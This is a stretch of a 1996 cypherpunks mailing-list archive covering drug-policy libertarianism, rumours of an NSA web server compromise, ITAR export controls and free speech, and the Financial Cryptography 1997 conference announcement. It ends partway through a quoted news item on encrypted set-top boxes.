BkI69RhKIffi62toqQWNXBSMHHdnbLT2Idpq3g8xk1XTV20P+F/SWDyUq2Ou82Kh
TvDIoJLC1b7cuN/YXl5fklRhEiebltCeW7iCbtUxceYdQIyL726mUiOjivGaUebf
RoIf2k4eZP7M6bLnH1R64dZBhrm0SnkV8AOgDIkAEQEAAbQgUGF1bCBFLiBSb2Jp
Y2hhdXggPHBhdWxAbGpsLmNvbT6JARUDBRAyE5ZISnkV8AOgDIkBATDtB/9lG7wY
kbD+AMjRzA7B5siTj4GA+e2hPYBeEKsOMjOrmnks/mV1Yct07B6jvKzrEZSwOxvw
dZv9svquN+Ob1M53X/HDEDtQHPxshKpbWUlOYHJ5hNsF5Kdq2tzpgNFEdlReLTLA
nTAgC97H5E4BN88Yop9gRIKkXeQgxNhQTZ/VEkyN9gjlZzMslXh3YdpsXJLrYGaA
Q6IKCTp+LOdUhcPhw2iXKRKLUYWeg/2ey615vef7bj3ma8RJorFcXJRvs7lkUxfE
McwN6t1rgmytjPvKAwHqSEDtiBQo1OkOgsZk9GrM0qK40v81OBfWpvnXI9nc9R/M
RlsFiBzsHTeRvL4T
=51A7
- -----END PGP PUBLIC KEY BLOCK-----

Cheers,
- -Paul
-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b4 e22

iQEVAwUBMndlYkp5FfADoAyJAQHElgf8CWbZevCfOI0fzrYxg6J9TsekmoBYUGqW
qefjwWKXJXHEQZl5zFUTbVH2lmsFIloh5yCEgBPKEl5+bQGLtyHFDUdVVxFO2z36
XsGLbBOyWaLuP4PUGcZpQ3HVY0QFVSOt0Ni4XOXUmCHmG2A8oOdty8d8mbSCg+No
htr9EKIngu/++K02stHZ87Frgmc7cZd/OAs+ZxUaCdNor6cJk/plVMilvDS06Vn5
Qv7ZXSYC2P8BAn5WGZUD/PTvND+SMa0LBVJsEmKasfBtSFGK2nlXsivp+frSfdOK
XnchT1hsNb5FXJJvQwiak507yzdsbC/S6FefK6slh6e8p5d5ZyBgzQ==
=W6G9
-----END PGP SIGNATURE-----

--
Paul Robichaux		LJL Enterprises, Inc.
paul@ljl.com		Be a cryptography user. Ask me how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Edwards <SAlanEd@concentric.net>
Date: Wed, 30 Oct 1996 06:35:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  Sex, drugs, and libertarianism
Message-ID: <1.5.4.32.19961030143658.006a98a0@pop3.concentric.net>
MIME-Version: 1.0
Content-Type: text/plain



I urge people to think carefully about issues of morality, ethics, free
will, and the type of society we wish to have. People make choices every
day. To use or not to use drugs is just another choice.

--Tim May

True.  I agree that the war on drugs is useless, and that prohibiting
prostitution is even more mindless.  Still, the libertarian ideal seems even
worse.  Think about Thailand, where sex is bought and sold openly.  The AIDs
infection rate has gone from near zero to 2.5% in a couple of years, and
promises to devastate the whole country. Burmese kids are sold into sex
slavery.   Is this the future?  People make choices every day, but few
people make INFORMED choices, and a lot of people, believe it or not, have
very little choice.  They are caught between the Devil and the Deep Blue Sea.  
 

SAlanEd@concentric.net, SAlanEd@aol.com,
http://users.aol.com/salaned/cyberplace.html

"Life, he himself said once, (his biografiend, in fact, kills him verysoon,
if yet not, after) is a wake, livit or krikit, and on the bunk of our
breadwinning, lies the cropse of our seedfather..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Wed, 30 Oct 1996 06:13:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Montgolfiering" mindlessness
Message-ID: <9610301347.AA16765@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


What bombastic dribble is this?  Me thinks our good yet crazy friend has been ingesting Dr. Bronner's Pure Peppermint Castille far beyond the recommended quantities.

You are montgolfiering into the hot air that swells your brain.

I joined this list to learn about cryptology and its related topics, not to have my inbox filled with the ramblings of impotents.

Victor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 30 Oct 1996 09:50:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anti-Bayesian algorithms for Montgolfiering reputation capital
Message-ID: <sd4dy8m9L0LV085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Reputation capital is becoming increasingly important in the online
community.  A key problem facing new entrants to cyberspace, as well as
the people who deal with them, is how much capital these new entrants
can be said to posess.

A typical solution proposed might be described as "Bayesian", whereby
new entrants to the community are assigned a quantity of reputation
capital that reflects the expectation value of their future reputation
capital.  This is unsatisfactory, because, like all Bayesian statistical
methods, it ultimately relies on the very fallible judgment of the
entities who make such assignments (or that of the implementors of the
automated agents which make such assignments).

It is clear that an effective measure of the initial reputation capital
of new entrants to the online community is greatly to be desired.  It is
felt by the author that anti-Bayesian methods, methods that make no *a
priori* assumptions about the reputations of new entrants, show great
promise as means for achieving this result.

The pioneering work of Parry et al. in the use of test messages to
inspire rapid responses from a community's new entrants.  This method,
which Parry and his colleagues name in their typically colloquial style
as "trolling for newbies", is described in detail in a review article
by Suter (1994).

In this article the author proposes the use of Parry test messages and the
responses generated thereby as a means of rapidly establishing initial
reputation capital for an online community's new entrants.  By
evaluating new entrants' responses to the test messages, messages which
can be carefully designed to virtually guarantee that a useful response
will be elicited. These responses can be reviewed by individuals or
tabulated and evaluated by software agents to estimate the new entrants'
most likely reputation capital without resorting to arbitrary assignment
of an initial value.  Established members of a community may use
existing filtering agents to eliminate Parry test messages and the
responses thereto from their own datastreams; or they may elect to allow
these messages through and review the Parry tests and resulting
responses themselves.

There are indications in the literature that other researchers are at
work on this technology.  For example, messages that resemble Parry
test messages have appeared recently which contain coding very similar
to work of May's (1993, 1994, 1995, 1996) that have generated responses
that are ideally suited for reputation capital establishment from new
community members.

This fertile field for study holds significant promise, and the author
welcomes further developments from any who chooses to work here.

- -- 
Alan Bostick               | "Dole is so unpopular, he couldn't sell beer on
mailto:abostick@netcom.com | a troop ship." (Ohio Republican Senator William
news:alt.grelb             | Saxbe on Bob Dole's early career in the Senate)
http://www.alumni.caltech.edu/~abostick
http://www.theangle.com/  The first site with a brain.  Yours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMneUvuVevBgtmhnpAQEE4wL+PnPHAIjYv77ad3xDYUM/WMFMqGubduyH
vs5veTK0BlqdFSChvponVpXGmP9fHXBnTVxlipj8To12DfFgFzYy1gqkQ0NgUrud
UHygCOU503ZIx2u5FpifLY95VR0u5HqG
=EU+x
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William I. MacGregor" <macgregor@austin.apc.slb.com>
Date: Wed, 30 Oct 1996 07:20:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: 2nd edition Puzzle Palace?
Message-ID: <v03007800ae9cca878b6e@[163.185.68.25]>
MIME-Version: 1.0
Content-Type: text/plain



Applied Cryptography references a 2nd edition of The Puzzle Palace by
Bamford and Madsen, 1995, but I can't seem to find it in any of the
bookstores in Austin.  Has it been published?  Thanks,

  - Bill


......     "Do, or do not.  There is no try."  - Yoda     .....
William I. MacGregor              Austin Product Center - Research
phone (1-512) 331-3733            P.O. Box 200015
fax   (1-512) 331-3760            Austin, TX 78720






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Filacchione <alexf@iss.net>
Date: Wed, 30 Oct 1996 06:49:09 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Rumours of NSA breakin
Message-ID: <01BBC647.5B5511A0@alexf.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



	I've been hearing rumours of an alledged compromise
of the NSA Web server but no hard evidence. The claim made is
that several Mb of files were downloaded from the server and
posted to the "Internet". I can't see it in sci.crypt or
alt.conspiracy though.

	I am more than a little skeptical of the claim, unless the
files in question were not considered sensitive - and there is
no reason to believe that the NSA would be keeing anything
secret on their Web server.

=-=-=-=-=-
*if* the page was hacked indeed, then I seriously doubt that files of any 
significance were taken.  I would think that they would not keep any 
classified info on a web server (!).  If someone hacked into the page, got 
the files, and then posted them to the internet they probably would *not* 
have posted these to sci.crypt, etc. (I like the addition of alt.conspiracy 
though).  My guess is that they would end up on a private mailing list, or 
end up getting posted to one of the "warez" groups or something.

If this were true, I would be interested to know just what it was that they 
were keeping on their website and why.  Could they be trojaned files? 
 Would the NSA go to so much trouble when there are easier ways of doing 
things?  Just curious about this....

Alex F
alexf@iss.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 30 Oct 1996 10:39:31 -0800 (PST)
To: "William I. MacGregor" <cypherpunks@toad.com
Subject: Re: 2nd edition Puzzle Palace?
In-Reply-To: <v03007800ae9cca878b6e@[163.185.68.25]>
Message-ID: <v03007801ae9d518f7203@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:19 AM -0600 10/30/96, William I. MacGregor wrote:
>Applied Cryptography references a 2nd edition of The Puzzle Palace by
>Bamford and Madsen, 1995, but I can't seem to find it in any of the
>bookstores in Austin.  Has it been published?  Thanks,
>

Read Ernest Hua's message from yesterday about this. He quoted an EE Times
article which said, in part:

>From EE Times

 October 21, 1996
 Issue: 924
 Section: Design -- Computers & Communications

 Required reading

 By Loring Wirbel
.....
 Cryptography buffs have been waiting for relief in the form of the
 third edition of James Bamford's classic The Puzzle Palace, on the
 workings of the NSA. The new edition is supposed to contain material
 from co-author Wayne Madsen detailing NSA presence at Internet
 switching centers, and cipherpunks have been disappointed that the
 book didn't meet its June release date. Rumor has it that squabbles
 between the two authors and the publisher may push the book out well
 into 1997.

--end excerpt---

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 30 Oct 1996 09:18:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: GAS_sed
Message-ID: <1.5.4.32.19961030171718.00688080@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-30-96. NYR Page One:

   "Ex-CIA Analysts Assert Cover-Up. Contend Agency Knew of
   Risk From Chemicals in Gulf War."

      When they insisted on pursuing the inquiry over the
      protests of senior officials, their promising careers
      were effectively destroyed. Their inquiry attracted
      concern at the highest levels of the agencies, including
      DCI Deutch. Government officials who had overseen
      investigations of gulf war illnesses "are continuing to
      lie, are continuing to withhold information."

      The couple met when they were both studying at the
      agency's photo-analysis school. She was placed in a
      fellowship program that singles out fast-rising female
      employees and offers experience in other agencies of the
      Government.

      She found work on Capitol Hill in the offices of the
      Senate Banking Committee. She was assigned to interview
      the gulf veterans who were calling the committee. She
      took home one report. She handed it to her husband, with
      the announcement, "Hey, we got gassed." He decided to
      start his own unauthorized investigation on the issue,
      gathering information from within the C.I.A.

      He said he had prevailed upon friends working in other
      parts of the agency to search through computers banks.
      "We just plugged in key words dealing with chemical and
      munitions storage," he said, "and we just began to pull
      up all this cable traffic."

   -----

   http://jya.com/gassed.txt  (16 kb)

   GAS_sed







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Oct 1996 09:21:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Good Netkeeping seal of approval????
Message-ID: <v03007800ae9d3e43b450@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Sheesh.!

Cheers,
Bob Hettinga

--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Rodney Thayer <rodney@sabletech.com>
Mime-Version: 1.0
Precedence: Bulk
Date: Wed, 30 Oct 1996 09:01:46 -0500
From: Rodney Thayer <rodney@sabletech.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: eTrust -- EFF+CommerceNet

(from the ISOC newsletter)

* ELECTRONIC-COMMERCE STANDARDS GROUP FORMED
In a push to encourage online commerce, the Electronic Frontier Foundation
and CommerceNet have teamed up to implement eTrust, a global initiative
that would allow qualified merchants to bear the eTrust logo. The
initiative has thus far formed a standards body made up of such companies
as Coopers & Lybrand, the Firefly Network, and Test Drive. This body,
dubbed the Commercial Guidelines and Auditing Standards Committee, has
developed a series of guidelines for an accreditation program, which the
group will take through a pilot phase towards the end of the year. A
commercial offering and a pricing structure are expected in the first
quarter of 1997. More information is available at http://www.etrust.org.
(Cowles/SIMBA Media Daily 10/17/96).

               Rodney Thayer <rodney@sabletech.com>       +1 617 332 7292
               Sable Technology Corp, 246 Walnut St., Newton MA 02160 USA
               Fax: +1 617 332 7970           http://www.shore.net/~sable
                           Communications Software Development



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 30 Oct 1996 13:07:11 -0800 (PST)
To: c62op27@ibx.com (Victor Fiorillo)
Subject: Re: ITAR / S 1726 / Civil Disobedience
Message-ID: <1.5.4.32.19961030210453.003cfe40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:03 AM 10/30/96 EST, you wrote:
>Would it be appropriate for other users to forward this 
>message to the prez with their signatures?

The message was sent from "cypherpunks@toad.com" and signed
"Cypherpunks", which was highly inappropriate.
(Wasn't a bad message, but cypherpunks is a bunch of
individuals, it's not an anonymous collective...)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@shelob.aracnet.com>
Date: Wed, 30 Oct 1996 14:06:39 -0800 (PST)
To: Victor Fiorillo <c62op27@ibx.com>
Subject: Re: ITAR / S 1726 / Civil Disobedience
In-Reply-To: <9610301303.AA16293@ibx.com>
Message-ID: <Pine.LNX.3.95.961030135938.10957B-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Oct 1996, Victor Fiorillo wrote:

> Would it be appropriate for other users to forward this message to the prez with their signatures?
> 

	I imagine, but would it be noticed, I don't believe I have gotten
one real (non autoresponder) message from there.  Good luck though.

Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!!**
        ____________________
 *---===|                  |===---*
 *---===|     Genocide     |===---*   "You have heard of me,
 *---===|       2600       |===---*    You have known what I have done,
 *---===|__________________|===---*    But if you really SEE me,
                                       You'll know your time has come."
Email:
gen2600@aracnet.com
					   Available on the web:
Beeper: (503) 204-3606
					Http://www.aracnet.com/~gen2600


Something I've been known to babble in my sleep:

   It is by caffeine alone that I set my mind in motion.
   It is by the Mountain Dew that the thoughts acquire speed,
   the lips acquire stains, the stains become a warning.
   It is by caffeine alone that I set my mind in motion.

============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Wed, 30 Oct 1996 11:01:56 -0800 (PST)
To: Cypherpunks <president@whitehouse.gov
Subject: Re: ITAR / S 1726 / Civil Disobedience
Message-ID: <2.2.32.19961030190411.00c1e988@pop.firefly.net>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks wrote:
>
>  1) Software is writing, so it is protected by the first amendment, 
>     so the ITAR is unconstitutional.  The idea that only paper books
>     are first amendment protected, and electronic books are not, is just 
>     plain wrong.
>

[   I don't usually CC: my messages to 'president@whitehouse.gov',
  but since it popped up there, I'll leave it.  Feels funny though.  ]

  Writing is expressing yourself in the external medium, in order to
influence other people. So is any other non-coercive action/work.
There has never been a fundamental functional difference between
different forms of expression, but since low technology allowed only
a few of such forms, and they stood apart from each other, it *looked*
like there was a difference.  Now the space of possible ways of
expression is getting increasingly populated, which confuses the
decent thinkers who are trying to fit the richness of the new world
into the old conceptual frameworks.  Most people are not "decent
thinkers" though - and the issues debated are not semantic.
"Books", electrons (that, BTW, play a much greater role in keeping paper
together than in transmitting data over optic cables), and references
to Constitution are just traditional incantations that people use to
express their positions on who they want to have control over what.
These issues are decided by social forces and available technologies.
Distinctions in semantics and delivery methods between books and speech,
electrons and photons, descriptions, imitations or snapshots of reality,
feelings delivered through drugs or through art, etc. have little to do
with the *effects* of these actions - and that's what everybody is
fighting to control.   Making sneaky semantic constructs (e.g., "electronic
books") to make positions look more "legitimate" is a usual tactic on both
sides, but everybody is just being hypocritical pretending that these things
matter. This hypocrisy may work - a little - for both sides. However,
I think that for serious practical purposes, people should engage in
direct social action and implement necessary technologies that may change
the battleground.  Philosophically, there are lots of interesting things
to discuss here as well - and I would be very happy to take part in the
debates - but electrons, books, and Constitution have little relevance
here.

---------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>     www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com  617-234-5452
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Wed, 30 Oct 1996 12:06:17 -0800 (PST)
To: alexf@iss.net (Alex Filacchione)
Subject: Re: Rumours of NSA breakin
In-Reply-To: <01BBC647.5B5511A0@alexf.iss.net>
Message-ID: <199610302006.PAA18786@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Filacchione sez:
> 
> 
> 	I've been hearing rumours of an alledged compromise
> of the NSA Web server but no hard evidence. The claim made is
> that several Mb of files were downloaded from the server and
> posted to the "Internet". I can't see it in sci.crypt or
> alt.conspiracy though.

I asked a Well-Placed friend. He assured me that if it has, it's
news to the folks who own the machine ;-}

Not even Fort Fumble would put their www server within half a
kilck of a classified machine.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Oct 1996 12:52:55 -0800 (PST)
To: FC97 Announcement List <rah@shipwright.com>
Subject: Financial Cryptography 1997 (FC97): General Announcement
Message-ID: <v03007801ae9d5bdf0f34@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



Financial Cryptography 1997 (FC97):
The world's first financial cryptography conference, workshop, and exhibition!

General Announcement


Conference, and Exhibition,
February 24-28, 1997

Workshop for Senior Managers and IS Professionals
February 17-21, 1997


The Inter-Island Hotel
Anguilla, BWI


The world's  first peer-reviewed conference on financial cryptography,
FC97, will be held Monday through Friday, February 24-28, 1997, from 8:30am
until 12:30pm, at the Inter-Island Hotel on the Carribbean island of
Anguilla.

In conjunction with the conference, the Inter-Island Hotel will also be the
site of an intensive 40-hour workshop for senior managers and IS
professionals, during the week preceeding the conference (February 17-21),
and an exhibition for financial cryptography vendors, from 10am-6pm during
the week of conference itself.

The goals of the combined conference, workshop, and exhibition are to
provide a peer-reviewed forum for important research in financial
cryptography and the effects it will have on society,  to give senior
managers and IS professionals a solid understanding of the fundamentals of
strong cryptgraphy as applied to financial operations on public networks,
and to showcase the newest products in the field. In addition, plenty of
time has been left open in the afternoon and evening for sponsored
corporate functions and activities, for business networking, and, of
course, for recreational activities on Anguilla itself.

As one of the principals of the conference joked, "We hope that people will
treat the conference and the other activities more as a working vacation,
rather than, er, vacating work."

Conference participants are encouraged to bring their families.



The Conference

Ray Hirschfeld, the conference chair, has picked an outstanding group of
professionals and researchers, in financial cryptography, and in related
fields, to review the papers for this conference.

They are:

Chairman: Rafael Hirschfeld, CWI, Amsterdam, The Netherlands

Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Arjen Lenstra, Citibank, New York, NY, USA
Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
Charles Merrill, McCarter & English, Newark, NJ, USA
Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
Sholom Rosen, Citibank, New York, NY, USA
Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA

Some of the names may be recognizable to you. But, if they're not, included
in that list are the inventor of Millicent, the head of EU's CAFE digital
cash project, the holders of Citicorp's digital cash patent, two famous
scholars in cryptography and digital commerce law, the Chair of Eurocrypt
'96, and the Chairman of the Taskforce on the Security of Electronic Money
for the Bank for International Settlements.

If we'd gotten any more talent, we couldn't have had a conference, because
the committee can't review the work of it's own members!

The actual agenda of the conference will be determined by the papers the
program committee selects, so we won't have a final schedule for the
conference until the middle of January. However, the conference committee
is selecting papers in what it considers the union, and not the
intersection, of the fields of finance and cryptography.

Examples of topics it will consider are:

    Anonymous Payments                      Fungibility
    Authentication                          Home Banking
    Communication Security                  Identification
    Conditional Access                      Implementations
    Copyright Protection                    Loss Tolerance
    Credit/Debit Cards                      Loyalty Mechanisms
    Currency Exchange                       Legal Aspects
    Digital Cash                            Micropayments
    Digital Receipts                        Network Payments
    Digital Signatures                      Privacy Issues
    Economic Implications                   Regulatory Issues
    Electronic Funds Transfer               Smart Cards
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability

Financial Cryptography '97 is held in cooperation with the
International Association for Cryptologic Research. The conference
proceedings will be published on the web by the Journal for Internet
Banking and Commerce. <http://www.arraydev.com/commerce/JIBC/>.

For further information on submitting a paper to the FC97, and other
details about the program of the conference, please see program committee's
web-page at <http://www.cwi.nl/conferences/FC97>.


On the lighter side, the conference will be covered by Wired Magazine, and
will be the featured conference in it's January 1997, (ahem...) "Deductible
Junkets" section. So, you might want to register, and make your plane and
hotel reservations, before the rush begins...

The price of a pass to the conference sessions and exhibits is $1,000 U.S.

(Since we're on Anguilla, and there are no taxes of any kind, we thought
we'd keep prices in nice round numbers, just to make things interesting.
:-).)

The price includes breakfast at the conference, some stipends for
presenters who need them, and the logistics of having a professional
conference with high-bandwidth internet connectivity in a location like
Anguilla. In looking around, however, the conference organizers *did*
notice that FC97 price is in keeping with other business and professional
technology conferences of similar total session length, so everything seems
to work out. The market *is* efficient, after all.

You can register, and pay for, your conference ticket at:

<http://www.offshore.com.ai/fc97/>



The Exhibition

Concurrent with the conference will be the the FC97 Exhibition, a small
trade show for financial cryptography products and services. Each booth
will have high bandwidth access to the internet (yes, there *are* T1s in
Anguilla), and will get 2 conference passes. Booth prices start at $5,000
US. Please contact Julie Rackliffe at <mailto: rackliffe@tcm.org> for
further information . As space is limited, please register as soon as
possible if you plan to be there.



The Workshop

We are especially honored to have Ian Goldberg as the leader of the FC97
Workshop, which will run one week prior to the conference, February 17-21,
1997.

Ian, the cryptographer at Berkeley who was made famous last year (in
articles in both the Wall Street Journal and the New York Times) for
breaking Netscape's transaction security protocols, will be running an
intensive, 5-day workshop for senior managers and technology professionals.

While the workshop is still being developed, and will depend on the skills
of the planned participants, workshop topics will include, but not be
limited to:

The Internet (depending on the background of the participants)
Overview and background of cryptography
Survey of existing and proposed Internet payment systems
Details on some specific payment systems
Issues involved in setting up a secure Internet site

And, depending on whether Ian finishes coding it (it looks likely), a
step-by-step walkthrough of setting up an ecash-enabled Web server.

Ian has recruited strong roster of instructors with credentials similar to
his own, and, as he plans to maintain a 5-1 student/teacher ratio, the size
of the workshop will be restricted and 2 months advance registration well
be required.

Further information about the workshop can be found at:

<http://www.cs.berkeley.edu/~iang/fc97/workshop.html>

The planned price for the workshop is $5,000. This covers lab space,
hardware, network access, software, and, of course, 40 hours of instruction
and structured lab activity. The lab itself will be open 24 hours a day, if
demand warrants it.

Sponsorship Opportunities

FC97 offers many exciting sponsorship opportunities at all levels.
Corporations are encouraged to to be an exclusive sponsor for lunch or
dinner, each of which will be followed by a recreational activity of some
kind. Sponsors will have the opportunity to permanently attach their name
to these important networking functions, which the organizers hope will be
a large part of the conference experience. There are 10 such events being
planned, and 10 corporations will be accepted for sponsorship. Corporate
sponsors of these events will also get a substantial initial discount on
exhibit space, and complementary conference tickets.

In-kind sponsorship is available at all levels of support, with
opportunities for companies to provide networking, bandwidth, hardware,
radio pocket modems and equipment, as well as design and print services,
transportation, entertainment, catering, sunscreen and, well, if you've got
it and you think we'll need it, let us know about it -- we probably do.

Please contact Julie Rackliffe at <mailto: rackliffe@tcm.org> for further
sponsorship information.



Air Transportation and Hotels

Air travel to Anguilla is typically done through either St. Thomas for US
flights, or St. Maarten/Martin for flights from Europe. Several non-stop
flights a day from various US and European locations can be made to either
destination. Connection through to Anguilla can be made through American
Eagle, or through LIAT. See your travel agent for details. American Eagle
Airlines has agreed to increase their flights as needed to accomodate any
extra traffic the conference brings to the island.

Anguilla's runway is 3600 feet, with a displaced threshold of 600 feet, and
can accomodate business jets. Obviously, you should talk to your own FBO
for details about your own aircraft's capabilities in this regard.

Anguilla import duties are not imposed on hardware or software which will
leave the island again, so, as long as you take it with you when you leave
you won't pay taxes for leaving it there.

Hotels range from spartan to luxurious, and more information about hotels
on Anquilla can be obtained from your travel agent, or at
<http://offshore.com.ai/>.



Why Anguilla?

We picked Anguilla for two reasons, both of them mildly political. The
first is, of course, the US ITARs, which classify cryptography as a
"munition" and restrict it's export. Thus, every effort will be made to
highlight the absurdity of these regulations through the use of foriegn
software, "leaked" software, and, of course, where necessary, US-exportable
"crippleware", in the networking and server software of the conference and
workshop. Of course, the conference content itself is not a violation of
the ITARs, as the "munitions" being exported are in the heads of the
attendees, or on paper, and thus not (typically!) subject to the US ITARs.
Consider it a mild tweak on the nose of the Clinton Administration, in an
era of 56-bit exportable keysize maxima.

The other mildly political reason is that Anguilla is a tax haven. There
are no taxes except import duties. None. No income, capital gains, sales,
excise, or property taxes -- none. Anguilla's banking secrecy laws are about
the finest there are anywhere.

This is important to the organizers of the conference because most of the
other proposed regulations of financial cryptography, particularly those of
"token", or "note" based systems, are because they enable cash settlement,
even perfectly anonymous cash settlement, of transactions of practically
any size. Economic reality is not optional; if, in fact, the significantly
reduced cost of these technologies make auditable "book-entry" transaction
settlement obsolete, then there isn't much that the taxation or
law-enforcement authorities of the world's nation-states can do about it.
We consider countries like Anguilla an existance proof of the concept. Any
attempt to restrict these technologies will only backfire on nations
attempting to do so. Nation-states will simply have to develop taxation and
law enforcement methods other than auditing book-entries. In fact, most
central bankers and financial crime enforcement professionals who
understand the technology also realize this, so, of course, our point is
only *mildly* political, at this stage of the argument, anyway.

Of course, the fact that Anguilla's average daytime temperature in February
is in the low 80's farenheit, and that of, say, Boston, is in the low 20's,
and the fact that cyclonic storms are in the *other* hemisphere that time
of year, has *nothing*, we say, *nothing* to do with our decision to hold a
conference there. We're simply shocked you would suggest such a thing.
Neither, for that matter, does the fact that the average water visibility
on Anguilla's coral reefs can be measured in hundreds of feet (if you can
see that far for the blinding riot of color, that is...).



Registration for FC97

Again, if you're interested in coming to FC97 see:

<http://www.offshore.com.ai/fc97/>

For information on presenting papers at FC97 see:

<http://www.cwi.nl/conferences/FC97>

If you're interested in Exhibit space, please contact Julie Rackliffe:

<mailto:rackliffe@tcm.org>

If you're interested in sponsoring FC97, also contact Julie Rackliffe:

<mailto:rackliffe@tcm.org>

If you're interested in the FC97 Workshop for Senior Managers and IS
Professionals, see:

<http://www.cs.berkeley.edu/~iang/fc97/workshop.html>



See you in Anguilla!

The FC97 Organizing Committee

Vince Cate and Bob Hettinga, General Chairs
Ray Hirschfeld, Conference Chair
Ian Goldberg, Workshop Chair
Julie Rackliffe, Conference, Exhibit, and Sponsorship Manager










-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: captain_loogie@juno.com (Patrick Delaney)
Date: Wed, 30 Oct 1996 13:10:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <19961030.155848.10150.11.Captain_Loogie@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


put me on your mailing list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 30 Oct 1996 16:43:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: News: Sony/Philips has trouble exporting TV's
In-Reply-To: <199610300748.XAA29976@krypton.chromatic.com>
Message-ID: <v03007803ae9da57b4a8c@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain


>    Washington - New Internet-television systems from Sony Corp. and
>    Philips Electronics Co. are technically munitions under U.S. export
>    controls and cannot be shipped to the companies' worldwide sales
>    networks, it was disclosed last week.
>
>    Sony officials said the company's TV set-top box designed by WebTV of
>    Palo Alto, Calif., includes a state-of-the-art 128-bit code encryption
